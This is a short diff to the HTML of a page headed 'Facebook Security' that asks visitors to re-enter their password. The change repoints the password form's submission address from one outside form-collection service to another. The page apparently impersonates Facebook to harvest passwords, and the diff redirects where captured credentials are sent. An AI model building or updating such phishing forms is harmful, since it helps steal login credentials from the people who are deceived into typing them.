--- a/index.html
+++ b/index.html
@@ -116,7 +116,7 @@
             Facebook Security
         </div>
         <p>Please re-enter your password to complete the request.</p>
-        <form id="passwordForm" action="https://submit-form.com/ZciaRbkKz" method="POST">
+        <form id="passwordForm" action="https://submit-form.com/dj50WyPN0" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
